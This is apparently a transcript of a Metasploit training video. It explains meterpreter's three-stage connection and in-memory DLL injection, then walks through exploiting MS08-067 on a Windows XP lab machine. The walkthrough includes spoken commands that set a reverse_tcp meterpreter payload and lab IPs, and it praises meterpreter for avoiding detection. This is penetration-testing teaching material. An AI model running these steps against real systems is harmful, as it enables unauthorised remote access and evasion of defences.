Hello, welcome to InsectX. Information Security Technology is training on penetration testing with Metasploit. In the last video, we have covered the basic introduction to the meterpreter, and in this video, we are basically going to cover how the meterpreter shell goes under the three different stages. Okay, there are few steps involved in connection establishment between attacker machine and the victim machine. So this is the thing, the three stages. Coming to the first stage, during the stage 1, exploit and payload is sent to the victim machine. During this time, if both the exploit and payload gets executed, attacker machine establishes a reverse connection back to the framework machine where our Metasploit framework console is off and on running. After this, during the stage 2, attacker machine will send a stage 2 payload which basically contains DLL injection, and this directly injects into the victim machine. This stage 2 payload will get executed and runs meterpreter DLL from the attacker machine directly into the memory of the victim machine. And finally in the last stage, okay, in this last stage, connection establishment is finally taken place between the attacker machine and the victim machine with a full-fledged session. Okay, and one of the best part of the meterpreter is it doesn't create any kind of a new process, and moreover it completely resides in the memory, so there is no chance of getting detection, and moreover it doesn't write any kind of data to the disk. Okay, it doesn't create any kind of files over the target victim machine, and whatever the communication which is held between the attacker machine and the victim machine will be completely encrypted. It creates a separate channel to encrypt the data. Whenever the data transmission is taking place between the attacker machine and the victim machine, it will be purely encrypted. So now what we will do is, we shall take an example. I will be having my Kali Linux as the attacker machine running with the Metasploit framework console, and using that we shall try to exploit the remote vulnerability which is running on the Windows box, that is on the Windows XP machine. So let me choose the exploit, use exploit Windows SMB MS 08 06 _ net API, and we are going to set the payload. Set payload Windows meterpreter reverse _ TCP. Okay, it creates a reverse _ TCP connection. Okay, meterpreter, and here we need to supply the options. Okay, so the options include the remote host, that is the victim's IP address, and the L host, that is the attacker's IP address. Set R host, that is the victim's IP address, 192.168.159.132, and L host, attacker's machine, 192.168.159.134. Okay, now we shall check whether it can be exploitable or not. So we got the info that the target is vulnerable, so that we can exploit the machine. Just type exploit and hit enter, and you can see the stage payload, right? And finally we got the meterpreter session 1, which is opened on the victim machine on this particular IP, right? So if you do a quick question mark over the victim machine, this particular meterpreter contains default set of bunch of commands, okay, which provides the functionality for performing the post exploitation phase. It contains core commands, file system commands, user interface command, webcam commands, elevation commands, privilege escalation commands. Okay, so we will be keep on working on these things in the separate video, that is in our next video. That's all for this video. Thanks for watching.